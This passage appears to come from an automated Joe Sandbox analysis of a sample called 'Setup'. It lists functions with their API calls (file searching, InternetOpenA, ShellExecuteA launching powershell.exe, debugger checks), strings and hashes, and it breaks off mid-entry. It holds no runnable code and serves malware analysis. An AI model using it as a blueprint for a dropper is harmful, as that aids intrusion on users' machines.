Instruction Fuzzy Hash: 1FC13975D10222ABCB10FF65D905A7EBBB9EF44710F148066EA41EB2C2E7719AC5CF90

Function 031CEF40 Relevance: 1.8, APIs: 1, Instructions: 271COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 031CF1C7

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: ff5dd2a8a6b70d696426aeabdbaa008a7d06e8f2d117705eaf1d22e11c69c791
Instruction ID: f0ee271dfb24298735e649690d2b98137e8b90bffcd08109799d9a8b8512fe04
Opcode Fuzzy Hash: ff5dd2a8a6b70d696426aeabdbaa008a7d06e8f2d117705eaf1d22e11c69c791
Instruction Fuzzy Hash: 9F9171B6E10619AFCB14DFA8D845AAEBBF5FB5C710F14422DE815E7340E731A911CBA0

Function 031BB970 Relevance: 1.6, APIs: 1, Instructions: 125COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 031BBA9F

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 90e3e46abb5ff85d1dc71aacb825aac1637dcfe9d8bacd45a322dfb69113c427
Instruction ID: a4495c4dd374ea4ee40ca674764facd76baf0cc3b34bc1aa02a59b6df7105409
Opcode Fuzzy Hash: 90e3e46abb5ff85d1dc71aacb825aac1637dcfe9d8bacd45a322dfb69113c427
Instruction Fuzzy Hash: 72311572E082149BCB15DF7CC8806AEFBB5AF8D210B19827EE855DB341DB30D95587E1

Function 031A8BF0 Relevance: 1.6, APIs: 1, Instructions: 115networkCOMMON

Download Yara Rule

APIs

Part of subcall function 031D71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03235040), ref: 031D7297

Part of subcall function 031BB460: Concurrency::cancel_current_task.LIBCPMT ref: 031BB532

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000), ref: 031A8D4C

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ByteCharConcurrency::cancel_current_taskInternetMultiOpenWide
String ID:
API String ID: 1314137346-0
Opcode ID: 336dbe58972b43e21a2695643bb071f12ba33e5663a7f587ad6bdb782b4f9124
Instruction ID: cdf8009a6c74552af63311f7ab031692c7ec2042fa65730f1e31c0afac22bcd7
Opcode Fuzzy Hash: 336dbe58972b43e21a2695643bb071f12ba33e5663a7f587ad6bdb782b4f9124
Instruction Fuzzy Hash: 2241C070E15358AFDB00EF6CC94579DBFB0AF1A708F204289F4006F682D7B55A858BD1

Function 031BB460 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 031BB532

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 8d437cba7398257db7e2cbdbc1582932ab9ba3f4a77c99cee76857e992bd0240
Instruction ID: 7a54970a21ed8f39247b82b01684d863d7d46cc6acf9dd15261d42e6320738c3
Opcode Fuzzy Hash: 8d437cba7398257db7e2cbdbc1582932ab9ba3f4a77c99cee76857e992bd0240
Instruction Fuzzy Hash: 52212D769052085BC724DF68D8806EFBBE8EF4D320F19416ADC2ACF780DB31995087D2

Function 02DF11F7 Relevance: 1.6, APIs: 1, Instructions: 325memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02DF1271

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction ID: 22b2ec6402f9003566b8a84b4de5174ce701a6f0d475525d451480c70bf1e46b
Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction Fuzzy Hash: A8B1D171500706EBDBA19E608C80BABB7F9FF45314F160519EB9E96340E731E950CFA9

Function 031D763E Relevance: 1.6, APIs: 1, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 031A66F1

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: dbb5decc20227e57874957cc59350a17d848b0d52c92f7253143bb6eefe2671c
Instruction ID: 2abf652210078d30b3e7f3da07ef2bc6f0512310fb1483344acac48958584b2f
Opcode Fuzzy Hash: dbb5decc20227e57874957cc59350a17d848b0d52c92f7253143bb6eefe2671c
Instruction Fuzzy Hash: 7821B77590470CEFD714DF98D900B99B7FCEB09720F14462AF9249B680E771A6508794

Function 031D5070 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?,03235040), ref: 031D50C2

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: c772c748b6169c1b7d4115d1b795bb4dc36ef7dd1d9c083b74a75e8123bdada6
Instruction ID: fdeacb8cb18af76af7ce59829bfd3041e2164e7b283590276b39dd2c53a8f21e
Opcode Fuzzy Hash: c772c748b6169c1b7d4115d1b795bb4dc36ef7dd1d9c083b74a75e8123bdada6
Instruction Fuzzy Hash: 0221D570A0431C9FDB24CF14DD55BEABBB8FB0AB04F10429AE5065B680DBB56A44CB90

Function 031EF9CE Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,031A66AC,?,?,?,?,031A66AC,?,0323384C), ref: 031EFA2E

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8ee8638300daf36d4886e9eb1b07f42358ff9088b1a685074cb2c71a10a3208b
Instruction ID: 1444df52913af7473a20e75abc58c05fb1ddfd38aa6deade26da5c603638f2bb
Opcode Fuzzy Hash: 8ee8638300daf36d4886e9eb1b07f42358ff9088b1a685074cb2c71a10a3208b
Instruction Fuzzy Hash: 90017175A002199FC701EF58E584B9EBBF9EF88A40F164059ED05AB254D7719901CB90

Function 03202531 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,?), ref: 03202572

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a27a62fa3d8ff4b4829807e40348132af1184bd095c16220c720870330f17ef1
Instruction ID: bb06ee13c920acd6b964bc1c007347daf45929f0defba08f96e1a924f19652aa
Opcode Fuzzy Hash: a27a62fa3d8ff4b4829807e40348132af1184bd095c16220c720870330f17ef1
Instruction Fuzzy Hash: 6FF05031A64335D7DB38EAE6AC2DB177F5C9F44360B088813A805EB0C1CF70D44441D4

Function 03203B1C Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 03203B4E

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: dd8fa249be6fdc2b04ced000048a199e0a9ddf9319fc5d51b39316df3b4608f3
Instruction ID: fd5c89b5034681fcbbb152c73ccdd1cb5e22f730571b8a38fa0e19c5c0300562
Opcode Fuzzy Hash: dd8fa249be6fdc2b04ced000048a199e0a9ddf9319fc5d51b39316df3b4608f3
Instruction Fuzzy Hash: 2DE02B3E2257226BDB31F6699C04B5BB74C9F567B8F090121DF06AB1C1CF64C48441E4

Function 031A1200 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 031A1239

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: f1933f2bc0a67be1748d483dd487459c8d6370bed9e5523bbd1c54aac705dd67
Instruction ID: 64597439b42ad7baf8ca748ee721f9bb2a89ad83b88c3f7e46f6590195b25e8f
Opcode Fuzzy Hash: f1933f2bc0a67be1748d483dd487459c8d6370bed9e5523bbd1c54aac705dd67
Instruction Fuzzy Hash: 1BF0ECB0D0430CABD700EFA8EE86699F7F4FF08220F504369DC4167280FB306A198682

Function 031E36B3 Relevance: 1.5, APIs: 1, Instructions: 17COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031E36BA

Part of subcall function 031DCC05: _Maklocstr.LIBCPMT ref: 031DCC41
Part of subcall function 031DCC05: _Maklocstr.LIBCPMT ref: 031DCC5A
Part of subcall function 031DCC05: _Maklocstr.LIBCPMT ref: 031DCC69

Part of subcall function 031EEE33: GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,031E36E0,00000000,?,00000004,031E02C9,?,00000004,031E1351,00000000,00000000), ref: 031EEE50

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Maklocstr$H_prolog3InfoLocale
String ID:
API String ID: 3572464808-0
Opcode ID: 93e4d013acf5a761387fe37f7a5bc34a39893f634e49989ed788325ac506d566
Instruction ID: a64106dcfdfc6f3a3c591572e23337bf3ecd5c3af4e1c033974c5748249298d8
Opcode Fuzzy Hash: 93e4d013acf5a761387fe37f7a5bc34a39893f634e49989ed788325ac506d566
Instruction Fuzzy Hash: 06E012F4C147149FCB60FF74850065ABBF4FF18B40B008D2E9665CB600E7B09560DB94

Non-executed Functions

Function 031ABF90 Relevance: 21.2, APIs: 12, Strings: 1, Instructions: 1732memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 031BB460: Concurrency::cancel_current_task.LIBCPMT ref: 031BB532

GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 031ACA1A
HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 031ACA21

Part of subcall function 031B2A20: NtQueryAttributesFile.NTDLL ref: 031B2B25

Part of subcall function 031D5280: NtCreateFile.NTDLL ref: 031D5433
Part of subcall function 031D5280: GetProcessHeap.KERNEL32 ref: 031D5459
Part of subcall function 031D5280: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 031D5463
Part of subcall function 031D5280: NtReadFile.NTDLL ref: 031D5493

GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 031ACE03
GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 031AD1E4
HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 031AD1EB
GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 031AD5BF
GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 031AD99A
HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 031AD9A1
GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 031ADD5E
HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 031ADD65
HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 031AD5C6

Part of subcall function 031B6050: Concurrency::cancel_current_task.LIBCPMT ref: 031B6133

HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 031ACE0A

Part of subcall function 031BB220: Concurrency::cancel_current_task.LIBCPMT ref: 031BB36D

Strings

#, xrefs: 031ADD89

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Heap$Process$Free$Concurrency::cancel_current_taskFile$AllocateAttributesCreateQueryRead
String ID: #
API String ID: 4111404930-1885708031
Opcode ID: ad11644ff8fca2141e53e4d8796a8554e9fc723ada4aca5b0003f5ad6ce71f7b
Instruction ID: 53ccb3bb0b6c2d262378a58ca41dc3f46e75b7824094b9c202c86a23224fafc3
Opcode Fuzzy Hash: ad11644ff8fca2141e53e4d8796a8554e9fc723ada4aca5b0003f5ad6ce71f7b
Instruction Fuzzy Hash: BD136770C01399DBEB24DB64CD54BEEBBB1AF59304F1082D9E0096B291DBB55B88CF91

Function 031ADED0 Relevance: 13.9, APIs: 9, Instructions: 376fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(?,?), ref: 031ADF52
PathMatchSpecA.SHLWAPI(?,00000000,?,?), ref: 031AE074
FindFirstFileA.KERNEL32(?,?,?,?,?,?,0322675C,00000001,?,?,00000002), ref: 031AE1D0
FindNextFileA.KERNEL32(00000000,00000010), ref: 031AE29F
FindClose.KERNEL32(00000000), ref: 031AE2AE
FindNextFileA.KERNEL32(00000000,00000010), ref: 031AE2E2
FindClose.KERNEL32(?,?,?), ref: 031AE301
FindClose.KERNEL32(?), ref: 031AE30D
FindClose.KERNEL32(?), ref: 031AE3D0

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Find$CloseFile$FirstNext$MatchPathSpec
String ID:
API String ID: 2359873101-0
Opcode ID: 95cc40804e0b559cf340d3f643e9c6a38d1553d81df9e2314468470437c6385a
Instruction ID: ae79d1e7b7a65ef7fcdda8e4eaa01e0fcb1180f2e5004d4cccddc9241e671440
Opcode Fuzzy Hash: 95cc40804e0b559cf340d3f643e9c6a38d1553d81df9e2314468470437c6385a
Instruction Fuzzy Hash: D7F1CE75D01269DFCB25DBA8C958BEEBBB8BF08304F1441E9E415AB281DB705B85CF90

Function 031CE440 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 629COMMON

Download Yara Rule

Strings

), xrefs: 031CEDEF
powershell.exe, xrefs: 031CE2A8, 031CE462
-, xrefs: 031CEE57
type must be number, but is , xrefs: 031CEEDB

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: DispatcherExceptionFolderPathUser
String ID: )$-$powershell.exe$type must be number, but is
API String ID: 3583530794-3753438943
Opcode ID: d6175d935822fdd174b29a9ec65ef97ee4fc496d1e27325b58116febd92473c1
Instruction ID: dab789487854800c7923353b07e266ce8ddcd1442a9bd210e45136af035bbef6
Opcode Fuzzy Hash: d6175d935822fdd174b29a9ec65ef97ee4fc496d1e27325b58116febd92473c1
Instruction Fuzzy Hash: 81626930D05298DBEF15DB64CD54BDDBBB0AF69304F2482D9D0492B292DBB51B88CF92

Function 0320C129 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0320C1C2
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0320C1EB
GetACP.KERNEL32 ref: 0320C200

Strings

OCP, xrefs: 0320C17D
ACP, xrefs: 0320C147

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 13f1abb3b0984abbcd31f5305fe8a92c2054f5c2eab4f4d0ce309d4a72b69ad3
Instruction ID: c1e8879e41fbd53342807234ab6d95a99f7a7e3c7cd70adee344e71d1f804d4c
Opcode Fuzzy Hash: 13f1abb3b0984abbcd31f5305fe8a92c2054f5c2eab4f4d0ce309d4a72b69ad3
Instruction Fuzzy Hash: 62210BB2660126AADB30DF54CD00A97F376AF44E60B5A8764E90ADF196E732D9C8C350

Function 031D0200 Relevance: 7.7, APIs: 3, Strings: 1, Instructions: 1686COMMON

Download Yara Rule

Strings

J, xrefs: 031D2091

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Concurrency::cancel_current_taskFolderPath
String ID: J
API String ID: 1258877742-1141589763
Opcode ID: 370d38306eb2877d15d953b112aa34b123277af83e5d8358b4107c117190481e
Instruction ID: 4c26eb10a8b52361cb516e246809357d197926cb4f3b58da88cd824f2f3ad4a3
Opcode Fuzzy Hash: 370d38306eb2877d15d953b112aa34b123277af83e5d8358b4107c117190481e
Instruction Fuzzy Hash: 37133670C053A89BDB25EB64CD547EDBBB0AF59308F1082C9D5492B292DBB51BC8CF91

Function 0320C305 Relevance: 7.7, APIs: 5, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 03203639: GetLastError.KERNEL32(00000000,?,03209FF0), ref: 0320363D
Part of subcall function 03203639: SetLastError.KERNEL32(00000000,00000000,00000000,032351F0,000000FF), ref: 032036DF

GetUserDefaultLCID.KERNEL32 ref: 0320C40D
IsValidCodePage.KERNEL32(00000000), ref: 0320C44B
IsValidLocale.KERNEL32(?,00000001), ref: 0320C45E
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0320C4A6
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0320C4C1

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 2e0b8a821fab544764767d4239d8682daaa1cd6d5852b9d451497521ebdd0ba0
Instruction ID: e49ec983f4666f59fe9beb753edec97782517cd4b59f040dc452496b4eaba0d2
Opcode Fuzzy Hash: 2e0b8a821fab544764767d4239d8682daaa1cd6d5852b9d451497521ebdd0ba0
Instruction Fuzzy Hash: EF5189B59202269FDB20EFA5DC84ABEB7B8BF08700F194565E911EF1D1D7B0D588CB50

Function 031D20C0 Relevance: 7.6, APIs: 5, Instructions: 148comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 031D210D
CoCreateInstance.COMBASE(0321D1E0,00000000,00000001,0321D1C0,?), ref: 031D2128
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 031D2182
CoUninitialize.COMBASE ref: 031D220A
CoUninitialize.COMBASE ref: 031D2276

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Uninitialize$ByteCharCreateInitializeInstanceMultiWide
String ID:
API String ID: 4150283-0
Opcode ID: c53a293103b840a502bccb0df7f82e03b5aecb74ff48a8762971ba44e4acd8ee
Instruction ID: 40c443e3687041206756f0aede835ca40eae2f08bd762fc333dc3a6b5bead942
Opcode Fuzzy Hash: c53a293103b840a502bccb0df7f82e03b5aecb74ff48a8762971ba44e4acd8ee
Instruction Fuzzy Hash: 9A51CDB5A402299FCB14DF54DD48BADBBB8FF4E704F004189E60AAB2A0DB716E41CF55

Function 031CE240 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 476COMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(00000000,03226F48,?,00000000,00000000,00000000), ref: 031CE3F1

Part of subcall function 031CE1A0: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 031CE1CF
Part of subcall function 031CE1A0: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 031CE1F1
Part of subcall function 031CE1A0: WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 031CE210
Part of subcall function 031CE1A0: CloseHandle.KERNEL32(00000000,?,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 031CE226

Part of subcall function 031BB460: Concurrency::cancel_current_task.LIBCPMT ref: 031BB532

Strings

powershell.exe, xrefs: 031CE2A8, 031CE462
-, xrefs: 031CEE57
type must be number, but is , xrefs: 031CEEDB

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: File$CloseConcurrency::cancel_current_taskCreateExecuteHandlePointerShellWrite
String ID: -$powershell.exe$type must be number, but is
API String ID: 503567120-4150588111
Opcode ID: 022cf5c80527f40b0a73dd452f569bddff47924b367f63399c695b24a8d087cf
Instruction ID: 6758d10f9d7735c9c2cdbcd25c386168edcb3d046f6658f66e2ccdff77873ca0
Opcode Fuzzy Hash: 022cf5c80527f40b0a73dd452f569bddff47924b367f63399c695b24a8d087cf
Instruction Fuzzy Hash: 5922BE30D10398DFDB14DFA4C954BEEBBB1AF69304F248299D4057B281DBB55B88CBA1

Function 02DA9C94 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55fd2cb6fd69b7c20b0acb75fc0c464944f2818f61bddf13411a0be40e06c056
Instruction ID: 7d437d85c6bf4efe433706f1848f0c9065ee9abe8567a95472192619f3324c2c
Opcode Fuzzy Hash: 55fd2cb6fd69b7c20b0acb75fc0c464944f2818f61bddf13411a0be40e06c056
Instruction Fuzzy Hash: 1C021971E012199BDF14CFA8C990AAEFBF1FF48314F248269D919A7384D731AE45CB94

Function 031F84B0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51f56c8a706c4c2995a9b19c15f5606495a590284d04ad7f6333c41a5ced18d5
Instruction ID: 5b562efbace33b303a7c24c04dd143d3c479fe599b7c224629d47c39a4b8ebe9
Opcode Fuzzy Hash: 51f56c8a706c4c2995a9b19c15f5606495a590284d04ad7f6333c41a5ced18d5
Instruction Fuzzy Hash: 76022B75E012199FDF14CFA9C9806AEFBF5FF88314F188269D619EB340D731AA418B90

Function 031D7EE1 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 031D7EED
IsDebuggerPresent.KERNEL32 ref: 031D7FB9
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 031D7FD2
UnhandledExceptionFilter.KERNEL32(?), ref: 031D7FDC

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: f18a6f6320819266cd1354a988bfedac443b7527440dc6cfcf1f5a81adeedf1a
Instruction ID: 3f4a17d68e14df38e0c67c0213c77e386455c7c6baa517d073e210ba26c10714
Opcode Fuzzy Hash: f18a6f6320819266cd1354a988bfedac443b7527440dc6cfcf1f5a81adeedf1a
Instruction Fuzzy Hash: D4310A79D453289BDF60EF64D949BCDBBB8BF18700F1041EAE40CAB250EB719A858F45

Function 0320BDA0 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 03203639: GetLastError.KERNEL32(00000000,?,03209FF0), ref: 0320363D
Part of subcall function 03203639: SetLastError.KERNEL32(00000000,00000000,00000000,032351F0,000000FF), ref: 032036DF

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0320BDF4
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0320BE3E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0320BF04

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: dc6c0d2eeac89228e24baf09c2dc8b8c39746332f51a8c04fe4f6821970b22ea
Instruction ID: 954d42a48a9905a671203942173f61bfd755ee8f00a3d933241d1f113b2ec851
Opcode Fuzzy Hash: dc6c0d2eeac89228e24baf09c2dc8b8c39746332f51a8c04fe4f6821970b22ea
Instruction Fuzzy Hash: 0E617C7556021B9FDB38DF64C885BAAB3A9EF04310F1841AAEA05CB5C6E774D9C8CF50

Function 031FBEAD Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 031FBFA5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 031FBFAF
UnhandledExceptionFilter.KERNEL32(031F37AD,?,?,?,?,?,00000000), ref: 031FBFBC

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2364e03c60de43a82b9325879cb1f686013a8a456d458a766b96a7ed4da609ef
Instruction ID: f6907a0094f2e44c05cbb17d7fe43d185ded5d2b44c76867cdc06047f0d8b61a
Opcode Fuzzy Hash: 2364e03c60de43a82b9325879cb1f686013a8a456d458a766b96a7ed4da609ef
Instruction Fuzzy Hash: C131C574941328ABCB21DF64D988B8DBBB8BF5C710F5081DAE81CA7250EB749B958F44

Function 02D63864 Relevance: 4.4, Strings: 3, Instructions: 605COMMON

Download Yara Rule

Strings

LiH, xrefs: 02D63BB1
!, xrefs: 02D6418F
PiH, xrefs: 02D63BE9

Memory Dump Source

